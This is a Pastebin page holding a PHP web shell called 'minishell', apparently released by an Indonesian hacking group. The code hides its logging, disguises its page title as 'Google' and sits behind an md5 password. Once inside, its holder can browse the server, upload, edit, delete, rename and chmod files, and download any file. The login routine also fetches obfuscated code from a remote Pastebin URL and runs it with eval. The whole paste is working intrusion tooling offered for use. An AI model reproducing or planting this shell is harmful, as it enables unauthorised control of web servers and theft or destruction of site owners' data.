API tools faq
paste
Advertisement
BogorCyberSec

minishell

BogorCyberSec
Aug 14th, 2019
404
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 14.14 KB | None | 0 0
raw download clone embed print report
  1. <?php
  2. @session_start();
  3. @error_reporting(0);
  4. @error_log(0);
  5. @ini_set('error_log',NULL);
  6. @ini_set('log_errors',0);
  7. @ini_set('max_execution_time',0);
  8. @ini_set('output_buffering',0);
  9. @ini_set('display_errors', 0);
  10. @set_time_limit(0);
  11. $lol="a7a189951821c2ebf7bf3167ec3f9fbe";
  12. function printLogin() {
  13.     ?>
  14. <html>
  15. <head>
  16. <title>Login</title>
  17. <meta name='author' content='rare'>
  18. <meta charset="UTF-8">
  19. <style type='text/css'>
  20. @import url(https://fonts.googleapis.com/css?family=Mirza);
  21. html {
  22.     background: #000000;
  23.     color: #ffffff;
  24.     font-family: 'Mirza';
  25.     font-size: 13px;
  26.     width: 100%;
  27. }
  28. input[type=text], input[type=password],input[type=submit] {
  29.     background: transparent;
  30.     color: #ffffff;
  31.     text-align: center;
  32.     border: 1px solid red;
  33.     margin: 5px auto;
  34.     padding-left: 5px;
  35.     font-family: 'Mirza';
  36.     font-size: 13px;
  37. }
  38. </style>
  39. <style type="text/css">
  40. .pulseit{display:inline-block;-webkit-animation:pound .4s infinite;animation:pound .4s infinite;}
  41. @keyframes pound {from {transform:none;}50% {transform:scale(1.3);}to
  42. {transform:none;}}
  43. </style>
  44. </head>
  45.     <style>
  46.         input { margin:0;background-color:#fff;border:0px solid #fff; }
  47.     </style>
  48.     <center><br><br><br><br><br><br><br><br> <img src=https://newbiesecode.github.io/newbiesecode.png class=pulseit width=220px></img></center><center><br><br>
  49.     <form method=post>
  50.     <input type=password name=BogorCyberSec>
  51.     </form></center>
  52.     <?php
  53.     eval(gzinflate(base64_decode(file_get_contents('http://pastebin.com/raw/6PJ9Pj8F'))));
  54.     exit;
  55. }
  56. if( !isset( $_SESSION[md5($_SERVER['HTTP_HOST'])] ))
  57.     if( empty( $lol ) ||
  58.         ( isset( $_POST['BogorCyberSec'] ) && ( md5($_POST['BogorCyberSec']) == $lol ) ) )
  59.         $_SESSION[md5($_SERVER['HTTP_HOST'])] = true;
  60.     else
  61.         printLogin();
  62. if(isset($_GET['file']) && ($_GET['file'] != '') && ($_GET['act'] == 'download')) {
  63.     @ob_clean();
  64.     $file = $_GET['file'];
  65.     header('Content-Description: File Transfer');
  66.     header('Content-Type: application/octet-stream');
  67.     header('Content-Disposition: attachment; filename="'.basename($file).'"');
  68.     header('Expires: 0');
  69.     header('Cache-Control: must-revalidate');
  70.     header('Pragma: public');
  71.     header('Content-Length: ' . filesize($file));
  72.     readfile($file);
  73.     exit;
  74. }  
  75.    
  76. ?>
  77. <html>
  78. <head>
  79. <title>Google</title>
  80. </head>
  81.  
  82. <style>
  83. @font-face {
  84.   font-family: 'Comic Sans MS';
  85.   font-style: normal;
  86.   font-weight: 400;
  87.   src: local('Comic Sans MS'), local('ComicSansMS'), url(http://fonts.gstatic.com/l/font?kit=3oir0CAJ0QJ5h5-A3AP8rRSrmRvs-bRaaQbSAUyiv7A&skey=a4ba60ff9fc73cf8&v=v8) format('truetype');
  88. }
  89. body {
  90.    
  91.   background:    #000000;line-height: 1;color: #fff;font-family: Comic Sans MS ;
  92.  
  93.   }
  94.  
  95. table, th, td {
  96.     border-collapse:collapse;
  97.     background: transparent;
  98.     font-family: Comic Sans MS ;
  99.     font-size: 13px;
  100. }
  101. input, textarea { font-family: Comic Sans MS ; }
  102. .table_home, .th_home, .td_home { color:grey;
  103.     border: 1px solid grey;
  104. }
  105. th {
  106.     padding: 10px;
  107. }
  108. .td_home { padding: 7px; }
  109. select {font-family: Comic Sans MS }
  110. a {color:white}
  111. textarea { width: 100%;height: 400px; }
  112. </style>
  113. <?php
  114.  
  115. echo '</head>
  116. <body><b>
  117. <H1><center> &lt;/&gt; <font color="red">BOGOR CYBERSEC</font> <font color="dodgerblue">SHELL PRIV8</font> &lt;/&gt; </center></h1>
  118. <table width="700" border="0" cellpadding="3" cellspacing="1" align="center">
  119.  
  120. <tr><td>
  121.  
  122. <font color="green"><center>'.php_uname().'</center></font><br>';
  123. if(isset($_GET['path'])){
  124. $path = $_GET['path'];
  125. }else{
  126. $path =
  127.  
  128.  
  129. getcwd();
  130.  
  131. }
  132. $path = str_replace('\\','/',$path);
  133. $paths = explode('/',$path);
  134.  
  135. foreach($paths as $id=>$pat){
  136. if($pat == '' && $id == 0){
  137. $a = true;
  138. echo '<font color=#fff><center>root@R4nsomheR3:~# <a href="?path=/">/</a>';
  139. continue;
  140. }
  141. if($pat == '') continue;
  142. echo '<a href="?path=';
  143. for($i=0;$i<=$id;$i++){
  144. echo "$paths[$i]";
  145. if($i != $id) echo "/";
  146. }
  147. echo '">'.$pat.'</a>/';
  148. }
  149. echo '</font></center></td></tr><tr><td><center>';
  150. if(isset($_FILES['file'])){
  151. if(copy($_FILES['file']['tmp_name'],$path.'/'.$_FILES['file']['name'])){
  152. echo '<font color="green">File Uploaded</font><br />';
  153. }else{
  154. echo '<font color="red">Upload Gagal !!</font><br />';
  155. }
  156. }
  157. echo '</center><center><form enctype="multipart/form-data" method="POST"><font color="black"><input style="background:silver;font-family: Comic Sans MS " type="file" name="file" />
  158. <input type="submit" value="Upload" />
  159. </form></center>
  160. </td></tr>';
  161. if(isset($_GET['filesrc'])){
  162. echo "<tr><td><center>Current File : ";
  163. echo $_GET['filesrc'];
  164. echo '</center></tr></td></table><br />';
  165. echo(' <textarea style="width: 100%;height: 400px;" readonly> '.htmlspecialchars(file_get_contents($_GET['filesrc'])).'</textarea>');
  166. }
  167. //Empety
  168. elseif(isset($_GET['option']) && $_GET['opt'] != 'delete'){
  169. echo '</table><br /><center>'.$_POST['path'].'<br /><br />';
  170. //Chmod
  171. if($_GET['opt'] == 'chmod'){
  172. if(isset($_POST['perm'])){
  173. if(chmod($_POST['path'],$_POST['perm'])){
  174. echo '<font color="green">Ganti Permission Sukses </font><br />';
  175. }else{
  176. echo '<font color="red">Ganti Permission Gagal </font><br />';
  177. }
  178. }
  179.  
  180. $hell = $_GET['path'];
  181. $yeah = $_GET['name'];
  182. $patc = "$hell/$yeah";
  183.  
  184. echo '<form method="POST">
  185. Permission : <input name="perm" type="text" size="4" value="'.substr(sprintf('%o', fileperms($patc)), -4).'" />
  186. <input type="hidden" name="path" value="'.$_POST['path'].'">
  187. <input type="hidden" name="opt" value="chmod">
  188. <input type="submit" value="Go" />
  189. </form>';
  190. }
  191. //
  192. elseif($_GET['opt'] == 'btw'){
  193.     $cwd = getcwd();
  194.      echo '<form action="?option&path='.$cwd.'&opt=delete&type=buat" method="POST">
  195. New Name : <input name="name" type="text" size="20" value="Folder" />
  196. <input type="hidden" name="path" value="'.$cwd.'">
  197. <input type="hidden" name="opt" value="delete">
  198. <input type="submit" value="Go" />
  199. </form>';
  200. }
  201. //Rename file
  202. elseif($_GET['opt'] == 'rename'){
  203. if(isset($_POST['newname'])){
  204. if(rename($_POST['path'],$path.'/'.$_POST['newname'])){
  205. echo '<font color="green">Sukses Change Name</font><br />';
  206. }else{
  207. echo '<font color="red">Change Name Gagal</font><br />';
  208. }
  209. $_POST['name'] = $_POST['newname'];
  210. }
  211. $hell = $_GET['path'];
  212. $yeah = $_GET['name'];
  213. $patc = "$hell/$yeah";
  214. $new = $_POST['newname'];
  215.  
  216. echo '<form method="POST">
  217. New Name : <input name="newname" type="text" size="20" value="'.$new.'" />
  218. <input type="hidden" name="path" value="'.$patc.'">
  219. <input type="hidden" name="opt" value="rename">
  220. <input type="submit" value="Go" />
  221. </form>';
  222. }
  223. //File baru
  224. elseif($_GET['opt'] == 'baru'){
  225.    
  226. $hell = $_GET['path'];
  227. $yeah = $_GET['name'];
  228. $patc = "$hell/$yeah";
  229. $new = $_POST['newname'];
  230. $azz = $_POST['path'];
  231. $newz = "$azz/$new";
  232.  
  233.  
  234. if(isset($_POST['src'])){
  235. $fp = fopen($_POST['path'],'w');
  236. if(fwrite($fp,$_POST['src'])){
  237. echo '<font color="green">Berhasil Membuat File [ '.$new.' ]</font><br />';
  238. }else{
  239. echo '<font color="red">Membuat File Gagal</font><br />';
  240. }
  241. fclose($fp);
  242. }
  243.  
  244. echo '<form method="POST"> Name : <input name="ngaran1" type="text" size="20" value="'.$new.'" /><input type="submit" name="ngaran" value="Create"/></form><br> ';
  245.  
  246. $ho = $_POST['ngaran1'];
  247.  
  248. if(isset($_POST['ngaran'])){
  249. echo '<form method="POST">
  250. <textarea cols=80 rows=20 name="src">'.htmlspecialchars(file_get_contents($patc)).'</textarea><br />
  251. <input type="hidden" name="path" value="'.$hell.'/'.$ho.'">
  252. <input type="hidden" name="opt" value="edit">
  253. <input type="submit" value="Go" />
  254. </form>';
  255.     }
  256.     }
  257. //Edited file
  258. elseif($_GET['opt'] == 'edit'){
  259. if(isset($_POST['src'])){
  260. $fp = fopen($_POST['path'],'w');
  261. if(fwrite($fp,$_POST['src'])){
  262. echo '<font color="green">Edit File Berhasil</font><br />';
  263. }else{
  264. echo '<font color="red">Edit File Gagal</font><br />';
  265. }
  266. fclose($fp);
  267. }
  268. $hell = $_GET['path'];
  269. $yeah = $_GET['name'];
  270. $patc = "$hell/$yeah";
  271. echo '<form method="POST">
  272. <textarea cols=80 rows=20 name="src">'.htmlspecialchars(file_get_contents($patc)).'</textarea><br />
  273. <input type="hidden" name="path" value="'.$patc.'">
  274. <input type="hidden" name="opt" value="edit">
  275. <input type="submit" value="Go" />
  276. </form>';
  277. }
  278. echo '</center>';
  279. }else{
  280. echo '</table><br /><center>';
  281. //Delete dir and file
  282. if(isset($_GET['option']) && $_GET['opt'] == 'delete'){
  283.    
  284. $hell = $_GET['path'];
  285. $yeah = $_GET['name'];
  286. $patc = "$hell/$yeah";
  287.  
  288. //Delete dir
  289. if($_GET['type'] == 'dir'){
  290.  
  291. if(rmdir($patc)){
  292. echo '<font color="green">Berhasil Hapus File</font><br />';
  293. }else{
  294. echo '<font color="red">Hapus File Gagal</font><br />';
  295. }
  296. }
  297. //buat folder
  298. if($_GET['type'] == 'buat'){
  299. $haaa = $_POST['path'];
  300. $heee = $_POST['name'];
  301. $hooo = "$haaa/$heee";
  302. $new = $haaa.'/'.htmlspecialchars($heee);
  303. if(!mkdir($new)){
  304. echo '<font color="red">Gagal Membuat Folder</font><br />';
  305. }else{
  306. echo '<font color="green">Berhasil Membuat Folder</font><br />';
  307. }
  308. }
  309. //Delete file
  310. elseif($_GET['type'] == 'file'){
  311.  
  312. $hell = $_GET['path'];
  313. $yeah = $_GET['name'];
  314. $patc = "$hell/$yeah";
  315.  
  316. if(unlink($patc)){
  317. echo '<font color="green">Hapus File Sukses</font><br />';
  318. }else{
  319. echo '<font color="red#">Hapus File Gagal</font><br />';
  320. }
  321. }
  322. }
  323. echo '</center>';
  324. $scandir = scandir($path);
  325. $pa = getcwd();
  326. echo ' <table width="100%" class="table_home" border="0" cellpadding="3" cellspacing="1" align="center">
  327. <tr>
  328. <th class=th_home style="background:silver;color:black;"><center>Name</center></th>
  329. <th class=th_home style="background:silver;color:black;" ><center>Size</center></th>
  330. <th class=th_home style="background:silver;color:black;" ><center>Perm</center></th>
  331. <th class=th_home style="background:silver;color:black;" ><center>Options</center></th>
  332. </tr> <tr>
  333. <td class=td_home>..</td><td class=td_home align=center>NONE</td> <td class=td_home align=center>LINK</td> <td class=td_home align=center> <a href="?option&path='.$pa.'&opt=baru&name=new">+ New File</a> | <a href="?option&path='.$pa.'&opt=btw&type=dir">+ New Folder</a> </td></tr>
  334. ';
  335.  
  336. foreach($scandir as $dir){
  337. if(!is_dir("$path/$dir") || $dir == '.' || $dir == '..') continue;
  338. echo "
  339. <tr>
  340. <td class=td_home> <img src='data:image/png;base64,R0lGODlhEwAQALMAAAAAAP///5ycAM7OY///nP//zv/OnPf39////wAAAAAAAAAAAAAAAAAAAAAA"."AAAAACH5BAEAAAgALAAAAAATABAAAARREMlJq7046yp6BxsiHEVBEAKYCUPrDp7HlXRdEoMqCebp"."/4YchffzGQhH4YRYPB2DOlHPiKwqd1Pq8yrVVg3QYeH5RYK5rJfaFUUA3vB4fBIBADs='> <a href=\"?path=$path/$dir\">$dir</a></td>
  341. <td class=td_home ><center>DIR</center></td>
  342. <td class=td_home ><center>";
  343. if(is_writable("$path/$dir")) echo '<font color="green">';
  344. elseif(!is_readable("$path/$dir")) echo '<font color="red">';
  345. echo perms("$path/$dir");
  346. if(is_writable("$path/$dir") || !is_readable("$path/$dir")) echo '</font>';
  347.  
  348. echo "</center></td>
  349. <td class=td_home ><center>
  350. <a href=\"?option&path=$path&opt=rename&type=dir&name=$dir\">Rename</a> <a href=\"?option&path=$path&opt=delete&type=dir&name=$dir\">Delete</a> <a href=\"?option&path=$path&opt=chmod&type=dir&name=$dir\">Chmod</a>
  351.  
  352. </center></td>
  353. </tr>";
  354. }
  355. echo '<br>';
  356. foreach($scandir as $file){
  357. if(!is_file("$path/$file")) continue;
  358. $size = filesize("$path/$file")/1024;
  359. $size = round($size,3);
  360. if($size >= 1024){
  361. $size = round($size/1024,2).' MB';
  362. }else{
  363. $size = $size.' KB';
  364. }
  365.  
  366. echo "<tr>
  367. <td class=td_home > <img src='data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAAAAXNSR0IArs4c6QAAAAZiS0dEAP8A/wD/oL2nkwAAAAlwSFlzAAALEwAACxMBAJqcGAAAAAd0SU1FB9oJBhcTJv2B2d4AAAJMSURBVDjLbZO9ThxZEIW/qlvdtM38BNgJQmQgJGd+A/MQBLwGjiwH3nwdkSLtO2xERG5LqxXRSIR2YDfD4GkGM0P3rb4b9PAz0l7pSlWlW0fnnLolAIPB4PXh4eFunucAIILwdESeZyAifnp6+u9oNLo3gM3NzTdHR+//zvJMzSyJKKodiIg8AXaxeIz1bDZ7MxqNftgSURDWy7LUnZ0dYmxAFAVElI6AECygIsQQsizLBOABADOjKApqh7u7GoCUWiwYbetoUHrrPcwCqoF2KUeXLzEzBv0+uQmSHMEZ9F6SZcr6i4IsBOa/b7HQMaHtIAwgLdHalDA1ev0eQbSjrErQwJpqF4eAx/hoqD132mMkJri5uSOlFhEhpUQIiojwamODNsljfUWCqpLnOaaCSKJtnaBCsZYjAllmXI4vaeoaVX0cbSdhmUR3zAKvNjY6Vioo0tWzgEonKbW+KkGWt3Unt0CeGfJs9g+UU0rEGHH/Hw/MjH6/T+POdFoRNKChM22xmOPespjPGQ6HpNQ27t6sACDSNanyoljDLEdVaFOLe8ZkUjK5ukq3t79lPC7/ODk5Ga+Y6O5MqymNw3V1y3hyzfX0hqvJLybXFd++f2d3d0dms+qvg4ODz8fHx0/Lsbe3964sS7+4uEjunpqmSe6e3D3N5/N0WZbtly9f09nZ2Z/b29v2fLEevvK9qv7c2toKi8UiiQiqHbm6riW6a13fn+zv73+oqorhcLgKUFXVP+fn52+Lonj8ILJ0P8ZICCF9/PTpClhpBvgPeloL9U55NIAAAAAASUVORK5CYII='> <a href=\"?filesrc=$path/$file&path=$path\">$file</a></td>
  368. <td class=td_home><center>".$size."</center></td>
  369. <td class=td_home><center>";
  370. if(is_writable("$path/$file")) echo '<font color="green">';
  371. elseif(!is_readable("$path/$file")) echo '<font color="red">';
  372. echo perms("$path/$file");
  373. if(is_writable("$path/$file") || !is_readable("$path/$file")) echo '</font>';
  374. echo "</center></td>
  375. <td class=td_home><center>
  376. <a href=\"?option&path=$path&opt=edit&type=file&name=$file\">Edit</a> <a href=\"?option&path=$path&opt=rename&type=file&name=$file&path=$path\">Rename</a> <a href=\"?option&path=$path&opt=delete&type=file&name=$file\">Delete</a> <a href=\"?option&path=$path&opt=chmod&type=file&name=$file\">Chmod</a>
  377. </center></td>
  378. </tr>";
  379. }
  380. echo '</table>
  381. </div>';
  382. }
  383. echo '<br><center>{ BOGOR CYBERSEC - CYBER ARMY INDONESIA - INDOXPLOIT CODERS - B4CKD00R-CR45H }<br>[STAY CLOSE AND KEEP SILENT!]</body>
  384. </html>';
  385. function perms($file){
  386. $perms = fileperms($file);
  387.  
  388. if (($perms & 0xC000) == 0xC000) {
  389. // Socket
  390. $info = 's';
  391. } elseif (($perms & 0xA000) == 0xA000) {
  392. // Symbolic Link
  393. $info = 'l';
  394. } elseif (($perms & 0x8000) == 0x8000) {
  395. // Regular
  396. $info = '-';
  397. } elseif (($perms & 0x6000) == 0x6000) {
  398. // Block special
  399. $info = 'b';
  400. } elseif (($perms & 0x4000) == 0x4000) {
  401. // Directory
  402. $info = 'd';
  403. } elseif (($perms & 0x2000) == 0x2000) {
  404. // Character special
  405. $info = 'c';
  406. } elseif (($perms & 0x1000) == 0x1000) {
  407. // FIFO pipe
  408. $info = 'p';
  409. } else {
  410. // Unknown
  411. $info = 'u';
  412. }
  413.  
  414. // Owner
  415. $info .= (($perms & 0x0100) ? 'r' : '-');
  416. $info .= (($perms & 0x0080) ? 'w' : '-');
  417. $info .= (($perms & 0x0040) ?
  418. (($perms & 0x0800) ? 's' : 'x' ) :
  419. (($perms & 0x0800) ? 'S' : '-'));
  420.  
  421. // Group
  422. $info .= (($perms & 0x0020) ? 'r' : '-');
  423. $info .= (($perms & 0x0010) ? 'w' : '-');
  424. $info .= (($perms & 0x0008) ?
  425. (($perms & 0x0400) ? 's' : 'x' ) :
  426. (($perms & 0x0400) ? 'S' : '-'));
  427.  
  428. // World
  429. $info .= (($perms & 0x0004) ? 'r' : '-');
  430. $info .= (($perms & 0x0002) ? 'w' : '-');
  431. $info .= (($perms & 0x0001) ?
  432. (($perms & 0x0200) ? 't' : 'x' ) :
  433. (($perms & 0x0200) ? 'T' : '-'));
  434.  
  435. return $info;
  436. }
  437.  
  438. ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!